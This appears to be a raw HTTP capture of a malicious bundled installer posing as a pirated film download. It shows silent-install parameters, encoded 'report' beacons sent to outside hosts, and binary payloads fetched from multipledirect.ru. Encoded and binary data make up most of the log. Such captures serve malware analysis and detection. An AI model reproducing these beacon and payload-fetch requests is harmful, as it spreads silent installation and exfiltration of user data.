L.9.G.8.h.f.t.h.z.N.T.O.m.K.g.W.h.T.F.r. .w.0.h.u.4.M.6.9.3.f.w.9./.0.
n.R.R.4.4.R.A.o.l.p.G.h.6.6.N.w.n.p.K.H.g.s.Z.Z.C.D.G.l.e.X.9.F.9.Y.W.
u.7.X.P.Z.1.0.l.2.h.0.Y.d.S.l.h.c.n.n.X.h.w.b.5.U.u.k.A.R.5.Y.O.n.4.R.
o.k.L.c.V.i.c.F.s.R.c.N.n.u. .W.s.P.C.3.m.9.6.g.b.m.M.g.G.i.F.3.p.Z.E.
4.J.D.7.Q.v.R.o.R.h.v.E.J.R.C.y.w.6.N.R.U.M.c.v.M.Z.Z.L.Z.E.T.F.L.4.b.
t.m.1.C.G.z.f.w.T.C.x.8.h.h.Z.p.w.M.Z.N.r.D.J.q.q.K.r.0.8.L.6.i.S.p.r.
H./. .D.x.9.h.H.i.w.H.T.v.T.g.9.i.F.Q.J.A.k.7.v.N.n.a.U.y.J.8.U.7.v. .
3.u.i.I.2.T.3./.g.O.n.L.F.Y.K.z.d.G.g.j.h.h.J.m.W.h.h.F.W.N.K.Z.E.H.v.
B.N.u.h.B. .W.i.R.6.d.x.z.G.d.Y.G.8.w.h.m.r.Q.K.i.M.b.A.s.d.L.1.Y.A.D.
P.R.z.N.s.u.w.g.9.9.9.6.G.7.t.o.c.Q.g.g.j.1.s.o.r.2.W.a.C.G.D.I.C.h.L.
o.P.J.r.m.0.I.k.0.X.t.N.X.Q.l.r.b.E.o.Z.g.d.8.1.b.M.K.u.q.9.I.X.N.C.E.
w.m.2.h.O.V.x.p.l.l.7.5.4.U.F.M.z.u.8.T.J.u.8.E.j.E.p.U.E.4.7./.Z.M.f.
p.4.6.W.L.B.V.l.M.w.q.7.U.V.9.K.Q.L.g.N.P.w.J.z.0.J.C.T.4.1.m.3.x.g.k.
e.z.L.x.K.p.o.E.c.s.l.r.6.c.l.C.f.d.Y.0.g.P.r.x.O.w.k.l.G.1.U.t.R.
<<< skipped >>>


GET /?step_id=5&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:07 GMT
Content-Type: text/html
Content-Length: 6714
Connection: close
Content-Disposition: attachment; filename="5.txt"
..c.p.B.Q.b.W.Y.K.i. .K.1.Y.L.w.L.F.H.C./.1.E.V.v.3.r.q.Q.p.O.q.n.m.J.
w.9.D.I.V.r.u.p./.h.S.a.2.C.V.R.T.I.m.F. .7.6.f.e.W.1.2.h.m.b.O.5.X.O.
N.F.0.x.C.1.m.O.G.0.D.T. .f.a.n.G.W.Z./.v.2.g.R.o.N.X./.1.S.B.b.I.j.c.
e.A.R.f.u.l.B.0.i.c.u.B.i.c.3.D.2.h.G.1.m.n.1.L.6.k.h.q.H.d.9.l.m.J.q.
l.M.2.r.O.2.Y.U.s.T.s.f.n.x.C.8.d.z.w.I.h.s.Q.j.O.O.S.D.l.3.e.F.9.6.p.
m.4.k.8.9.O.6.i.a.F.3.C.X.8.t.b.E.E.M.3.4.X.B.5.i.r.p.S.M.T.3.K.V.g.7.
1.t.1.b.y.2.o.N.Q.M.r.d.e.N.3.R.s.s.R.O.U./.y.b.C.s.i.P.1.M.T.W.0.y.R.
N.U.W./.C.e.f.y.K.J.1.2.N.G. .u.T.s.3.D.E.X.l.U.s.j.d.C.J.Z.g.T.u.j.y.
7.R.E.x.H.g.p.u.9.h.P.W.f.M.s.9.c.N.s.B.j.E.y.1.c.V.o.2.l.3.E.Y.C.j.o.
D.g.U.L.L.8.s.Z.5.s.p.H.N.4.S.6.l.b.R.K.A.Y.r.3.8.6.C.9.c.w.n.r.P.z.4.
E.V.K.P.s.H.p.u.x.w.h.B.r.o.B.C.5.9.w.f.9.d.T.O.7.a.9. .V.U./.G.f.B.l.
e.A.o.y.F.H.e.S.G.c.0.0.5.6.K.7.B.0.2.p.0.m.V.Q.d.e.H.m.y.5.2.g.S.P.z.
w.M.C.P.F.q./.z.Y.s.S.s.F.6.R.L.o.h./.w.c.4.p.d.a.G.L.r.l.I.7.s.o.4.p.
S.M.X.D.M.i.5.g.L.R./.z.t.m.X.r.G.C.A.l.w./.f.g.6.K.w.u. .a.p.G.R.T.9.
j.Y.l.R.8.k.r.3.p.M.s.k.s.0.1.3.w.y.8.S.c.6.g.W.K.j.1.G.k.T.0.R.f.6.7.
T.k.Q.n.S.P.X.V.k.1.5.g.l.V.9.S.j.g.z.g.C.9.n.F.4.E.b.g.L. .9.B.M.4.Z.
h.1.b.5.Q.N.T.D.3.7.n.M.K.F.u.8.e.S.0. .L.i.v.8.f.v.t.Y.J.e.f.z.Z.z.w.
f.j.V.x.L.g.d.a.Z.l.R.V.D./.7.5.M.L.Q.t.B.r.g.N.3.P.l.8.q.0.C.8.F.F.N.
U.L.t.K.O.5.s.N.n.T.Q.c.D.a.P.h.h.h.Y.r.R.X.u.e.z.4.O.O.w.Z.L.6.v.1.l.
Z.W.r.A.Z.v.k.J.q.x.D.G.H.v.X.d.h.N. .n.A.9.V.7.z.h.6./.f.u.K.c.V.8.Q.
p.T.G.0.s.n.Z.t.1.z.g.Z.n.1.X.C.E.2.s.I.P.R.A.V.B.y.z.Q.T.P.T.Q.M./.u.
L.c.C.L.I.x. .d.F.d./.R.O.Z.d.h.a.1.T.S.4.u.y.L.V.r.p.u.1.t.Z.6.e.
<<< skipped >>>


POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5958
Cache-Control: no-cache

data=/Wg8/rvm30eXNBCDWYo6y&report=EoWEfO6Cpa i3NvZTV4ZYCimFI04jjvSuiR3cLYmpTZbPHy29g1HxId40XDF/bIXs6JmMFhEyrtdka6URZidHpwsRYdsErYKPOYN9M7fMp5PA2qYivrNeigFmHNOqahSB Be8CNnjLYxieXrkwcx1N7AeAGA1BUEQImrZwv3XaajCLaSKCwiIIX14fKW9nujhqLY3Zu5Y0b5K0SjQkFfaE48kKUdQtBbeXxmpFDG18jZQtzaTNjyFjCdZgWv3kJ3f893Hk9TgEl1QzRp1h0y3HKBAYezrz3xL9ZjTHNoZbH4K9TP6eqLEczHtcBFyfKPovcQxYelKRgDQe16Ymds6m18UsBVSlDEBSC3XKEjLYINMRefhZVMDCFeF6PjRrJ mV4IMcxXwoeK1uPT8AMzRWgve NsqIIMxalnqR1rcY4ys0Rs5WTn7cZbMlADVNdSUD2Yju0HaCeZD2rY1MrVQmwI85oy4LiXpGyJuqg89eIn8KeYYfQjnkopFXcX1EwZKyf2OK2h9Pyg EpQpk3FeoaLC8HZ5SXScPO2ZD3qgKgbDrbNidqrXhFfUGcMT/dxyvtcTKOFMOCGGhvGdDYNFr2P6RCk3ZAaipHsIW5qJIWK2XKzUAYNqUrHYaGaqzJJPIKTuOK7JirrVCRG81sPabzS 6zViEX FzNmqxzqFcKJoXVJuhDFI qe2wQ57HpCdDOJhYV8dSkucbxLktnWccBMG6nSUY71rEXeXVNZIOvcGOlpdS1ASO2UroNOvgunHZis1HRYN40EwNyk6zEsc2y2If RjYQZXILVKCcaAKH21Knq5uYTq0s/C1N18bXbt52X0Lx4T3Kls /y5pFktM7YgAnabbaEXFbgwJyIwod3FSWyuASo4piXZEHGAhtr1RSSjHup31CU8eY F1k/B90MQyjOAaGd 4KBF9vRCTnT6OVlAZ/tbRop08PbouNO/c52 /PGGYgpmNfHfns3OiYGqE9XrvicsYcpI ycY80JW8YHeBqY2G4eSjBE9skSoP6nHsQ3kP 6WzaxqD7nkP1kEAMqn4CgVdBKwkfXkD 8o9anUx2S5QqGQcMX8h3KZKu175ij2TtX/cyQUUpfkQdoUS8vIlYNthicK8/hDd8tHoAgEafNUU65r8pn 4U nCO0KI2RwfRrhkFOW2EfGO1jMEZ56LaNydtxSSfcP0BtRdUwFj0fZ6JbBQZ9aoACnA9QAsIfRP Bcohv45LefD1kCu5Rm1CkqNK7XOapiBj ENQGtVLnIq2B
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:34 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..



GET /?step_id=4_3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:07 GMT
Content-Type: text/html
Content-Length: 2734
Connection: close
Content-Disposition: attachment; filename="4_3.txt"
..l.9.w.g.P.u.r.m.L.6.d.4.n.S.O.h.a.b.H.M./.4.H.T.I.9.F.q.v.q.y.h.X.p.
c.k.9.C.2.g.R.r.f.e.M.a.Y.X.q.v.f.6.S.o.G.3.r.D.r.p.0.K.O.1.r.g.r.b.u.
l.u.I.F.W.Q.u.e.J.b.k.n.f.B.h.B.B.X.L.e.o.i.1.m.y.8.m.S.Y.F.S.l.I.J.m.
9.O.8./.I.x.I.r.9.0.Y.3.W.k.e.y.2.t.D.5./.X.c.1.n.q.i.W.Z.j.v.t.i.l.3.
w.n.H.4.M.N.v.F.2.F.6.R.W.H.G.Z.A.G.T.a. .P.9.A.6.C.g.0.i.k.t.t.T.G.d.
z.7.4.U.B.K.7.M.J. .b.L.7.b.C.6.W.f.U.l.P.W.d.v.Y.E.p.r.6.L.M.o.3.W. .
o.W.W.c.3.s.8.2.y.s.x.f.C.h.6.d. .7.c.I.R.d.4.z.8.B.6.p.8.s.A.7.8.Z.i.
0.L.V.r.F.E.5.P.X.E.0.a.a.u.w.D.G.o.L.V.W.O.a.Z.o.E.s.q.Y.4.L.u.3.2.1.
f.k.9.N.J.F.L.E.w.S.h.N.V.V.6.W.D.1.i.c.G.C.Q.F.v.h.a.g.D.v.u. .q.B.5.
o.q.b.D.v.D.N.3.X.e.b.n.P.1.V.1.9.D.j.y.g.l.4.j.9.b.l.O.K.6.l.Z.Y.o.4.
o.W.J.4.g.I.T./.w.N.O.q./.X.R.D.i.d.I.r.s.V.S.R.s.L.W.m.x.r.Z.d.E.b.k.
G.m.p.6. .Q.z.l.g.u.Q.V.Q.v.v.f.P.F.e.w.S.a. ./.S./.e.f.r.P.e.X.8.d.u.
f.S.V.K.0.E.S.v.Q.u.z.Z.o.u.D.L./.w.x.k.1.u.m.o.n.Z. .9.P.Q.5.E.1.V.q.
I.6.1.O.g.J.0.i.r.q.Q.8.7.4.L.n.B.8.V.Y.4.x.3.Y.9.9.c.2.0.s.4.h.E.P.A.
4.U.K.j.I.M.Y.Q./.I.V.5.y.v.c.K.3.M.5.O.u.t.1.8.C.O.d.k.K.Y.r.R.L.N.y.
L.z.O.N.y.L.2.B.W.F.8.G.U.2.v.I.C.r.u.x.G.5.4.7.j.p.X.X.1.9.a.L.2.7.s.
g.9.a.7.H.o.C.k.8./.Y./.i.z.W.e.s.8.6.b.B.7.f.P.B.5.b.I.F.Y.S.S.p.g.2.
u.a.p.o.8.8.v.E.R.s.i.j.i.k.P./.Q.I.d.J.5.L./.Q.B.U.W.X.e.R.8.t.U.8.o.
R.X.8.A.w.T.C.C.P.D.V.M.9.d.I.t.f.W.K.Z.4.B.B.X.6.7.L.o.6.k.D./.I.D.U.
r.p.z.A.j.d.A.m.j.3.I.m.m.B.2.Z.3.D.E./.o.P.0.v.z.h.f.f.9.c.W.o.z.7.u.
k.Z.1.T.S.5.U.d.7.S.B.4.Z.y.k.l.Q./.E./.M.I.u.n.9.t.f.J.V.4.L.p.f.h.C.
L.N.M.n.y.2.T.Z.c.9.d.J.Q.2.a.4.n.5. .j.R.A.M.7.x.e.k.r.T.6.s.T.5.
<<< skipped >>>


POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5368
Cache-Control: no-cache

data=ACXF6JRElEdb1m3OabzJ3D2b5w+m8D2mXeYYaRzI1yxvnemJCt52ZBFyMtNgLpO4pLxyGsAjeqZ9OswCYbl2+jbbpPr1RyQfI3ee6GhykO3VawGEWa7pnDSSQuBaulvNJ7p7aGFXgYcpy1Q3Va8Z9z1lH5tjXJSzqEhvz1Mmk1JHLogUfHTG4O9SW8b4DDNGE5CXvVq1OfOLn3hESSnmuaV3xGFr58fqsJt3lZQaLG//sV9aZlaxP2QorO7MNUpVWN59oPiCb1bGEEQ/gR06Z+VexU0Hi+O+NbivyVWQXAzisr6D9FdBrwjxmOJcWF4ODPp8KGF9PW85BmyzcNxu0X4/Sl0zAkvi1yJyEhPST9z7ZS1gh5OqXYW9ZUxeKMkDRqRxNeweBNm7bdSzbRzpEEIdEaZb51mvpSi/HtcQNyvqEUac7jNytxQk06WVLKNvf/FGtj1JJduRfa/mSZB39gbEXetLxJWyK6Rhc/k23WQ58Yr4S7EvnwBQPTFJp7wuTVFxVIxg3+n+FMKFKK+6UXK4WHt+jLh0VFAiKV+ZZ5mHtqr77bC8UuN89eyOZr9dw1dGIOeHK3N/NeJxvtepOiJ62fXuS6y8JZgr2QdyYGCKL7W6fEE6wOns7lzghO7UZL9I85OF2vehjR1ObSAao2/TAS90vFZB9xEACm0eh1+wyF2py4V74dNue8Hmw+GBRg1xbh4B0E4wxrKpprwDfO9aug9i1RYrLwA/gkGp9SpbzIemgfyIUu0+La5MGJkHAQMLN81FAGR4BopxrV5gWdCIIUOH/nqcoQI0Mtb+F6RiwmwnigStk0p4auATkhbWwo8eZKvC0pWNy5igdXs4vYP/qaCLlnE8JBS0G3nMEp7n7nugqeiqxUciJ38yOoux7FYMRThgDBuZmfEZmMK98pj77a4/c7IqCnf703wNwpcE2TfwYmnmitHqGCF2kVuKW45LX5qq5zFRl/GQevshp2rpnf7IMCqi8svICAXLoe0q3LF/Vak8VJhO8oZDsojn3P7goiz8LeLNNCJXZ&report=/ZdSMEwjhs5jh48PRJ8mip8v1zaz/Q8ivu94Okb/5gSwlGGAuO7ilKkT47yCunU7erZ+byBdPtIeayaAqJZ8aTJqhgTuU8A3RysXRmq19j9zYa5AKLq903wDcTNPRwl7fHTkzc3j6q+L7227LVx67xiBr7WKDuvXV1dH3+AUf+jj8TUpuNuJHKuYqxCgX1clEWk8OXjIG1z+Lh+tAnr6
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:04 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..



GET /get/?data=X78R3fMJAwzVd3H678kNunVp8V2hy/MaNDVsyZviAVqUqjrH5ck2U5rxjd9CME1q/vRUebLuJ4gzt88MkyVCj4gkxrhTS3B1YdjGjV8gH7XkOuh9ahoqAMln6cbQXtJ7J+Cvlf6U4jESk+d1WJIMs+v1kvqLnq2E4QkjYp2oEA7gUDnT2juDYdGkj0Xidb77LHfOSUSz17gfggP//o0tfzmnzmKJmHXJWq8zF04py+O65cCfxslm7EIZk5SLjkyYLRw/4pUUeiwhfSIXe9gPZzy/Q8Mco3sB7HIxiWfTZdfpFYvqY3FtQ1V6+WryJeOikvizLXWStExhAKMrHdivTiqjEQHU54xDXbD5swbLVCzWpMUaIGZSU+Soqr4nGFC0LI0rIhMvXSuwZMZsMjB5DindQWf8is4ytFhtlSNxkwxVoREupyRPVZ7Wf2V5fKlOLxBTI8LpQuBE5tEGIORu1ELgKHLdRapFmsIfcWyPL9bRWFc1Qi/taCUAj+Y4w/tbwTQYv+pd6BV0Isu67h4xUqBuaJdl0m53GADkFUevx23lFBKPUJ6qeUKsK/0U51YvUlw7Fg64kF37NPJecdzX7GbWlGqTOuoFVvPu1tQccEef&version=4 HTTP/1.1
Accept: */*
User-Agent: win32
Host: techine.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:54:59 GMT
Content-Length: 0
Connection: close



GET /?step_id=6_1_3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:36 GMT
Content-Type: text/html
Content-Length: 10242
Connection: close
Content-Disposition: attachment; filename="6_1_3.txt"
..V.M.g.8.9.J.3./.h.4.F.q.H.i.H.W.Y.S.5.7.B.z.6.1.W.M.b.O.J.u.n.6.t.F.
w.S.V.F.c.R.Y.k.G.g.n.Z.w.s.0.R.Q.x.m.z.E.o.s.8./.q.n.g.M.T.z.j.4.j.C.
v.l.R.6.f.u.y.A.r.D.d.K.u.A.I.z.Z.d.v.A.p.M.u.o.Q.t.d.b. .f.u.U.R.J.q.
5.8.m.7.K.0.3.O.n.t.k. .T.9.H.9.8.N.T.7.Z. ./.9.A.p.M.S.u.z.q.E.n.t.N.
W.U.V.5.b.W.z.q.a.v.q.x.K.Y.K.e.s./.i.b.C.K.d.M.y.i.B.3.P.I.I.z./.W.W.
i.O.D.D.u.B.I.M.1.s.q.h.G.j.i.i. .z.e.r.R.x.h.j.T.W.E.E.E.b.5.s.m.5.E.
d.G.A.Y.7.S.S.2.E.5.b.Q.p./.L.i.R.r.d.q.8.7.h.8.i.H.P.Y.c.t.f.C.b.T.7.
d.P.n.k.9.l.n.T.8.5.2.L.M.Y.T.c.7.8.N.N.m.h.3.Y.w.9.i.v.U.M.6.r.i.S.6.
u.K.D.D.R.6.h.w.j.L.v.6.j.l.o. .C.F.R.c.o.C.7.E.W.8.1.3.l.O.C.6.8.V.a.
N.K.q.X.C.u.f.B.g.9.X.m.u.O.V.V.m.S.R.X.a.M.T.f.A.l.d./.t.7.L.S.o.F.S.
T.1.j.H.P.k.P.v.5.T.c.t.Y.q.D.9.p.e.k.y./.n.r.v.T.w.c.j.7.J.0.d.c.s.D.
i.x.3.l.i.n.a./.x.E.G.T.z.8.Z. .o.n.I.k.A.k.P.7.4.x.n.G.S.Q.g.g.9.C.8.
i.r.i.p.Q. .0.3.3.M.6.J.N.g.J.Z.N.f.w.y.N.D.J.b.w./.p.j.x.E.t.H.X.7.c.
/.X.7.T.H.3.t.w.o.v.s.E.q.6.8.Q.6.j.1.E.O.i.q.D.T.A.J.L.q.d.a.8.K.S.B.
l.0.e.n.D.M.0.t.E.i.A.6.W.U.O.i.8.R.l.P.L.5.x.2.D.Q.a.j.C.T.i.1.V.X.E.
Z.p.0.X.s.7.K.P.a.0.j.q.Y.u.Q.G.I.F.U.G.y.5.d.g.o.J.z.L.r.O.q.2.7.s.X.
f.8.Q.z.m.c.P.8.t.4.G.F.A.7.K.e.N.5.j.4.E.s.G.7.E.A.W.A.m.x.n.b.S.M.u.
x.5.k.1.f.L. .k.S./.Q.M.i.t.z.w. .f.R.2.K.r.i.X.A.z.D.E.S.r.X.e.J.F.U.
u.D.A.o.K.m.7.X./.S.v.I.H.B.q.N.V.B.J.g.r.s. .S.s.A.U.a.x.M.p.R.3.E. .
8.M.1.M.M.2.x.r.W.l.Y.A.J.L.1.9.U.b. .v.c.K.m.p.X.c.K.s.H.V.n.o.Z.5.7.
V.O.f.M./.c.J.6.O.A.2.5.H.3.S.o.7.d.X.l.3.o.r.H.w.I.X.h.O.N.5.L.l.r.I.
t.e.5.I.D.t.A.O.O.0.y.Y.Z.3.D.b.D.p.A.r.b.u.2./.k.u.s.Y.B.C.Y.l.4.
<<< skipped >>>


GET /?e=eghjkt&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=24379&&country=UA&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: multipledirect.ru
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:21 GMT
Content-Type: application/octet-stream
Content-Length: 2275179
Connection: close
Content-Disposition: attachment; filename="g7CyPVZagCsRV8.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
..z.g."..g.......}.......G...G.........=..".....v.....9...#3..y#..M...
A..ty..es..H.......'..wf..g...^...O..5<..?r..A..HE..:/..o\.M....F..
5w..-$..G...Y..@}..kq.....S....C..;~..hb..F...V..9*..5(.....VN..?l.." 
..^...I...r..q1..=......^F..7d..*(.TV...A..*z..i9.GE......f~../|..R..\
N...y.."b..<......P...2e..0i.........=`[email protected]?..9f..U..XM..
Ig..$y..`......CV..s*..*c..[......#f..=v.\Y......{]..k2..R...C...0.. ~
..5..TQ.._]..$$..~f..W...J..tv..:a..J......ge..(=......O...r..|n..2...
B......)<..q1.BR...P..6<..*-..]...F..}%..1$.....JJ...h..>$.."
...U...N..hr..h'.M....Q..,}..`e......\..28...3.....A....r..9c..!..]K..
.U..tq...}._v..O...6w..'j......Z..)j..-4..A......Zz..3x.....XR...E..&~
..zb.....\...>a..<m.........9l.."(..^..\...Q;..%b..)..\Q..M[.. e
..da.....OI......&g..W......'j..9z..]..KQ.. (..jj..#...^..HB..}k..0u..
....X..%8..}5.F^...\..20...!..Y...B..A!..- ..t..NV...T..:8..&)..Q...J.
.$v..d#.I....]..(q..di......X...<..27..g..E....N..=...%,.QO...Q..xu
..*?.P...]...)v..%g..]..YW...i..pm..{..Sr..C...:s.. n......V..-f..)8.G
E..DN..?l.." ..J..Py..Bo..|b..b......T...0t..hv.E...J...e6..j(.L......
.l%..5*......D...,..#o..,..VB..HA..vs..hq.E...J...e6..j(.A...N...a:..n
$.....A...Y(..`I..r..Lu..[...n#..x=.I...^a..i'..a;.I...Y...t)..`9.....
\h..Bl..r ..}..._..>...!b..%[email protected]\..z`..di.A..._...$)..e6.....@..
.L,...=..h..F...H...}*..q,[email protected]%..|0.N...[...r ..~7.....\...I&..~
8..r......Z...f%..l0.O....e..b<..y6.P...Tm..u4..q*.....A....>..`
1..'.......A..:!..u0.F.......t"..w,.L...N...f0..`:.....Y...Q!..b=.
<<< skipped >>>


GET /?e=ytr&cht=2&dd=19&clsb=1&publisher=24379&country=UA&prv=bestadblocker&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: multipledirect.ru
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:38 GMT
Content-Type: application/octet-stream
Content-Length: 2252297
Connection: close
Content-Disposition: attachment; filename="dB1XJloRgbF4Qw.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
..z..^"[email protected]@......0..Q=]".....[,.......*.1..........
.....G.....-.>.(.b.?.:.6.4.*...'...(. .0.".M.P...\[email protected].
U.C.[.D.z.V.w.I.x.p.`.x.w.a.y.'...>.j.m..............\...U.........
..Y...=.r.".c.?.1.=.~. .8.&.s.>.'.6...S.].^...X.@.^.o.K...o.a.U.E.N
.u.w.o.{.t.d.][email protected].^.].\.&.$.&.%.o. .
Q.7.#.9...4.r...,.:.5.k.'[email protected][email protected].<
.R.v.`.u.B.8.'. .r.l.p.`..!...G.*.......^....... .%.8.....?.9...?.%.1.
7...>.%. .!.(...n...a.P.S.g.r...8.u.M._.N.e.........&.*...(.w.u.*. 
.m.4.k.<.7.6...n................M...........X.../.2.>.<.2...}
.?.!.9.'.r.?.&.7...R.\._...Y.[.G.].p.H...G.I.Q.O.D.1.s.u.m.{.....D.f.~
.j.e...k.l.S..\.v.......0...M.\.].Z.X.D.'.....,...7.e...$.p...!.9.>
.).#.f.'.4.Z.P.Y.]...p.A.\.W.M.O...C.P.F.L.}.y.8.H.t.}.z.b.,...x.l.e.M
.?.{K.O.L.A.Z.7.7.G.^[email protected]._.R.$.".$...m.&.S...<. .0.#.?.A.:...=.a.)
.L.J.W...X.E.V.T.V._.F._...M...S.h.x.;.}.:.{.3...`.i.y.o.u.q.f.t......
..X.....R.........H......... .9.z.-.".&.!.1.:.l.&.).#.'. . ...Y...Q...
F.W...A.O.G.D.R...J...p.r.n.t.6.f.q.c...b.*.f.r.h.".n_.........U......
.M.........C...<.}.2.5.$.#.s.>.o."...i./.).c.....U.K.V.[.[...r.F
.F...f...J.L.M.?.s.u.m.{.5.}.1.j.y.y.).h.w.`.l......Z.....T.1.....N...
H.....B...~.2.4.,.:.t. .3.=.b.@.!.5.6...(.J.....M.C.[.F.Q.H.O.E...H.K.
W.I.m.}.v.'. .u.'.w.K...\.e...q.A.Q......3.'.0...?..._.....V.)... .o..
.~.......0.>...7.....>.p... .{.n...h.R.g.K.C.e.U.F.P.h...a.e.x.^
.(.}.b.`.#.".h.>.:.H.^. .A.3..0.>.0.....>.....Z...%...". 
<<< skipped >>>


GET /?step_id=6_1_4&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:53 GMT
Content-Type: text/html
Content-Length: 10306
Connection: close
Content-Disposition: attachment; filename="6_1_4.txt"
..T.s.s.1.J.p.n.g.s.B.Y.B.W.W.f.S.U.M./.P.U.r.B.l.k.q.D.G.V.Y.E.j.3.w.
